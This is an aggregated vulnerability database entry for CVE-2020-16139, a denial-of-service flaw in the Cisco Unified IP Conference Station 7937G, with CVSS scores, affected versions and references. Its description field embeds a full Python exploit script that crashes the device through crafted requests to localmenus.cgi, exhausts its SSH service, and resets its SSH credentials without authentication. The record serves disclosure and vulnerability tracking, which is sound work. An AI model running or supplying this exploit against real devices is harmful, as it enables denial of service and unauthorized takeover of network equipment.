ID

VAR-202008-0712


CVE

CVE-2020-16139


TITLE

Cisco Unified IP Conference Station 7937G Input verification vulnerability in

Trust: 0.8

sources: JVNDB: JVNDB-2020-009443

DESCRIPTION

** UNSUPPORTED WHEN ASSIGNED ** A denial-of-service in Cisco Unified IP Conference Station 7937G 1-4-4-0 through 1-4-5-7 allows attackers restart the device remotely through sending specially crafted packets. Note: We cannot prove this vulnerability exists. Out of an abundance of caution, this CVE is being assigned to better serve our customers and ensure all who are still running this product understand that the product is end of life and should be removed or upgraded. For more information on this, and how to upgrade, refer to the CVE’s reference information. ** Not supported ** This issue is a vulnerability in an unsupported version. Cisco Unified IP Conference Station 7937G There is an input verification vulnerability in.Service operation interruption (DoS) It may be put into a state. Cisco 7937G is an online conference terminal equipment of Cisco (Cisco). There are security vulnerabilities in Cisco 7937G version 1-4-4-0 to version 1-4-5-7. An attacker can use this vulnerability to cause a denial of service. # Exploit Title: Cisco 7937G All-In-One Exploiter # Date: 2020-08-10 # Exploit Author: Cody Martin # Vendor Homepage: https://cisco.com # Version: <=SIP-1-4-5-7 # Tested On: SIP-1-4-5-5, SIP-1-4-5-7 # CVE: CVE-2020-16139, CVE-2020-16138, CVE-2020-16137 #!/usr/bin/python import sys import getopt import requests import paramiko import socket import os def main(argv): target = "" attack = "" username = "" password = "" divider = "=============================================" help_text = ''' exploit.py -t/--target ip-address-of-target -a/--attack attack-type [-u/--user username -p/--password password] %s Example: exploit.py -t 192.168.1.200 -a 1 Example: exploit.py --target 192.168.1.200 --attack 3 --user bob --password villa %s Attack types: 1: DoS with automatic device reset 2: DoS without automatic device reset 3: Change SSH credentials of target device ''' % (divider, divider) if len(sys.argv) == 1: print(help_text) sys.exit(2) try: opts, args = getopt.getopt(argv, "ht:a:u:p:", ["help", "target=", "attack=", "user=", "password="]) except getopt.GetoptError: print(help_text) sys.exit(2) for opt, arg in opts: if opt == "-h": print(help_text) sys.exit() elif opt in ("-t", "--target"): target = arg elif opt in ("-a", "--attack"): attack = arg elif opt in ("-u", "--user"): username = arg elif opt in ("-p", "--password"): password = arg if username != "" and password != "" and attack == "3": print("Starting SSH attack!") print(divider) print("Target: ", target, "\nAttack: ", attack, "\nUser: ", username, "\nPassword: ", password) finished = attack_ssh(target, username, password) elif attack == "1": print("Starting DoS reset attack!") print(divider) print("Target: ", target, "\nAttack: ", attack) finished = dos_one(target) elif attack == "2": print("Starting DoS non-reset attack!") print(divider) print("Target: ", target, "\nAttack: ", attack) finished = dos_two(target) print(divider) if finished == 1: print("DoS reset attack completed!") elif finished == 2: print("DoS non-reset attack completed!") print("Device must be power cycled to restore functionality.") elif finished == 3: tell = "SSH attack finished!\nTry to login using the supplied credentials %s:%s" % (username, password) connection_example = "ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 %s@%s" % (username, target) print(tell) print("You must specify the key exchange when connecting or the device will be DoS'd!") print(connection_example) elif finished == 0: print("Something strange happened. Attack likely unsuccessful.") sys.exit() def dos_one(target): url = "http://%s/localmenus.cgi" % target data = "A"*46 payload = {"func": "609", "data": data, "rphl": "1"} print("FIRING ZE MIZZLES!") for i in range(1000): try: r = requests.post(url=url, params=payload, timeout=5) if r.status_code != 200: print("Device doesn't appear to be functioning or web access is not enabled.") sys.exit() except requests.exceptions.RequestException: return 1 return 0 def dos_two(target): sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(15) try: sock.connect((target, 22)) except OSError: print("Device doesn't appear to be functioning (already DoS'd?) or SSH is not enabled.") sys.exit() transport = paramiko.Transport(sock=sock, disabled_algorithms={"kex": ["diffie-hellman-group-exchange-sha1", "diffie-hellman-group14-sha1", "diffie-hellman-group1-sha1"]}) fd = os.open("/dev/null", os.O_WRONLY) savefd = os.dup(2) os.dup2(fd, 2) try: transport.connect(username="notreal", password="notreal") except (paramiko.ssh_exception.SSHException, OSError, paramiko.SSHException): os.dup2(savefd, 2) return 2 return 0 def attack_ssh(target, username, password): url = "http://%s/localmenus.cgi" % target payload_user = {"func": "403", "set": "401", "name1": username, "name2": username} payload_pass = {"func": "403", "set": "402", "pwd1": password, "pwd2": password} print("FIRING ZE MIZZLES!") try: r = requests.post(url=url, params=payload_user, timeout=5) if r.status_code != 200: print("Device doesn't appear to be functioning or web access is not enabled.") sys.exit() r = requests.post(url=url, params=payload_pass, timeout=5) if r.status_code != 200: print("Device doesn't appear to be functioning or web access is not enabled.") sys.exit() except requests.exceptions.RequestException: print("Device doesn't appear to be functioning or web access is not enabled.") sys.exit() return 3 if __name__ == "__main__": main(sys.argv[1:])

Trust: 2.34

sources: NVD: CVE-2020-16139 // JVNDB: JVNDB-2020-009443 // CNVD: CNVD-2020-46809 // VULMON: CVE-2020-16139 // PACKETSTORM: 158817

IOT TAXONOMY

category:['Network device']sub_category: -

Trust: 0.6

sources: CNVD: CNVD-2020-46809

AFFECTED PRODUCTS

vendor:ciscomodel:unified ip conference station 7937gscope:gteversion:1.4.4.0

Trust: 1.0

vendor:ciscomodel:unified ip conference station 7937gscope:lteversion:1.4.5.7

Trust: 1.0

vendor:ciscomodel:unified ip conference station 7937gscope:eqversion:1-4-4-0 から 1-4-5-7

Trust: 0.8

vendor:ciscomodel:7937gscope:gteversion:1-4-4-0,<=1-4-5-7

Trust: 0.6

sources: CNVD: CNVD-2020-46809 // JVNDB: JVNDB-2020-009443 // NVD: CVE-2020-16139

CVSS

SEVERITY

CVSSV2

CVSSV3

NVD: CVE-2020-16139
value: HIGH

Trust: 1.0

NVD: JVNDB-2020-009443
value: HIGH

Trust: 0.8

CNVD: CNVD-2020-46809
value: HIGH

Trust: 0.6

CNNVD: CNNVD-202008-366
value: HIGH

Trust: 0.6

VULMON: CVE-2020-16139
value: HIGH

Trust: 0.1

NVD: CVE-2020-16139
severity: HIGH
baseScore: 7.8
vectorString: AV:N/AC:L/AU:N/C:N/I:N/A:C
accessVector: NETWORK
accessComplexity: LOW
authentication: NONE
confidentialityImpact: NONE
integrityImpact: NONE
availabilityImpact: COMPLETE
exploitabilityScore: 10.0
impactScore: 6.9
acInsufInfo: FALSE
obtainAllPrivilege: FALSE
obtainUserPrivilege: FALSE
obtainOtherPrivilege: FALSE
userInteractionRequired: FALSE
version: 2.0

Trust: 1.1

NVD: JVNDB-2020-009443
severity: HIGH
baseScore: 7.8
vectorString: AV:N/AC:L/AU:N/C:N/I:N/A:C
accessVector: NETWORK
accessComplexity: LOW
authentication: NONE
confidentialityImpact: NONE
integrityImpact: NONE
availabilityImpact: COMPLETE
exploitabilityScore: NONE
impactScore: NONE
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.8

CNVD: CNVD-2020-46809
severity: HIGH
baseScore: 7.8
vectorString: AV:N/AC:L/AU:N/C:N/I:N/A:C
accessVector: NETWORK
accessComplexity: LOW
authentication: NONE
confidentialityImpact: NONE
integrityImpact: NONE
availabilityImpact: COMPLETE
exploitabilityScore: 10.0
impactScore: 6.9
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.6

NVD: CVE-2020-16139
baseSeverity: HIGH
baseScore: 7.5
vectorString: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
attackVector: NETWORK
attackComplexity: LOW
privilegesRequired: NONE
userInteraction: NONE
scope: UNCHANGED
confidentialityImpact: NONE
integrityImpact: NONE
availabilityImpact: HIGH
exploitabilityScore: 3.9
impactScore: 3.6
version: 3.1

Trust: 1.0

NVD: JVNDB-2020-009443
baseSeverity: HIGH
baseScore: 7.5
vectorString: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
attackVector: NETWORK
attackComplexity: LOW
privilegesRequired: NONE
userInteraction: NONE
scope: UNCHANGED
confidentialityImpact: NONE
integrityImpact: NONE
availabilityImpact: HIGH
exploitabilityScore: NONE
impactScore: NONE
version: 3.0

Trust: 0.8

sources: CNVD: CNVD-2020-46809 // VULMON: CVE-2020-16139 // JVNDB: JVNDB-2020-009443 // CNNVD: CNNVD-202008-366 // NVD: CVE-2020-16139

PROBLEMTYPE DATA

problemtype:NVD-CWE-noinfo

Trust: 1.0

problemtype:CWE-20

Trust: 0.8

sources: JVNDB: JVNDB-2020-009443 // NVD: CVE-2020-16139

THREAT TYPE

remote

Trust: 0.6

sources: CNNVD: CNNVD-202008-366

TYPE

input validation error

Trust: 0.6

sources: CNNVD: CNNVD-202008-366

CONFIGURATIONS

sources: NVD: CVE-2020-16139

PATCH

title:End-of-Sale and End-of-Life Announcement for the Cisco Unified IP Conference Station 7937Gurl:https://www.cisco.com/c/en/us/products/collateral/collaboration-endpoints/unified-ip-phone-7940g/end_of_life_notice_c51-729487.html

Trust: 0.8

title:Cisco-7937G-All-In-One-Exploiterurl:https://github.com/fans0n-fan/cisco-7937g-all-in-one-exploiter

Trust: 0.1

title: - url:https://github.com/merlinepedra25/nuclei-templates

Trust: 0.1

title:kenzer-templatesurl:https://github.com/elsfa7-110/kenzer-templates

Trust: 0.1

title:CVE-Flowurl:https://github.com/404notf0und/cve-flow

Trust: 0.1

title:kenzer-templatesurl:https://github.com/arpsyndicate/kenzer-templates

Trust: 0.1

sources: VULMON: CVE-2020-16139 // JVNDB: JVNDB-2020-009443

EXTERNAL IDS

db:NVDid:CVE-2020-16139

Trust: 3.2

db:PACKETSTORMid:158819

Trust: 2.3

db:JVNDBid:JVNDB-2020-009443

Trust: 0.8

db:CNVDid:CNVD-2020-46809

Trust: 0.6

db:CNNVDid:CNNVD-202008-366

Trust: 0.6

db:VULMONid:CVE-2020-16139

Trust: 0.1

db:PACKETSTORMid:158817

Trust: 0.1

sources: CNVD: CNVD-2020-46809 // VULMON: CVE-2020-16139 // JVNDB: JVNDB-2020-009443 // PACKETSTORM: 158817 // CNNVD: CNNVD-202008-366 // NVD: CVE-2020-16139

REFERENCES

url:http://packetstormsecurity.com/files/158819/cisco-7937g-denial-of-service.html

Trust: 2.9

url:https://www.blacklanternsecurity.com/2020-08-07-cisco-unified-ip-conference-station-7937g/

Trust: 2.5

url:https://www.cisco.com/c/en/us/products/collateral/collaboration-endpoints/unified-ip-phone-7940g/end_of_life_notice_c51-729487.html

Trust: 1.7

url:https://nvd.nist.gov/vuln/detail/cve-2020-16139

Trust: 1.5

url:https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2020-16139

Trust: 0.8

url:https://cwe.mitre.org/data/definitions/.html

Trust: 0.1

url:https://nvd.nist.gov

Trust: 0.1

url:https://github.com/fans0n-fan/cisco-7937g-all-in-one-exploiter

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2020-16137

Trust: 0.1

url:https://cisco.com

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2020-16138

Trust: 0.1

url:http://%s/localmenus.cgi"

Trust: 0.1

sources: CNVD: CNVD-2020-46809 // VULMON: CVE-2020-16139 // JVNDB: JVNDB-2020-009443 // PACKETSTORM: 158817 // CNNVD: CNNVD-202008-366 // NVD: CVE-2020-16139

CREDITS

Cody Martin

Trust: 0.7

sources: PACKETSTORM: 158817 // CNNVD: CNNVD-202008-366

SOURCES

db:CNVDid:CNVD-2020-46809
db:VULMONid:CVE-2020-16139
db:JVNDBid:JVNDB-2020-009443
db:PACKETSTORMid:158817
db:CNNVDid:CNNVD-202008-366
db:NVDid:CVE-2020-16139

LAST UPDATE DATE

2022-07-12T02:16:50.837000+00:00


SOURCES UPDATE DATE

db:CNVDid:CNVD-2020-46809date:2020-08-19T00:00:00
db:VULMONid:CVE-2020-16139date:2021-07-21T00:00:00
db:JVNDBid:JVNDB-2020-009443date:2020-11-05T09:23:12
db:CNNVDid:CNNVD-202008-366date:2020-08-26T00:00:00
db:NVDid:CVE-2020-16139date:2021-07-21T11:39:00

SOURCES RELEASE DATE

db:CNVDid:CNVD-2020-46809date:2020-08-19T00:00:00
db:VULMONid:CVE-2020-16139date:2020-08-12T00:00:00
db:JVNDBid:JVNDB-2020-009443date:2020-11-05T09:23:12
db:PACKETSTORMid:158817date:2020-08-10T19:02:33
db:CNNVDid:CNNVD-202008-366date:2020-08-10T00:00:00
db:NVDid:CVE-2020-16139date:2020-08-12T21:15:00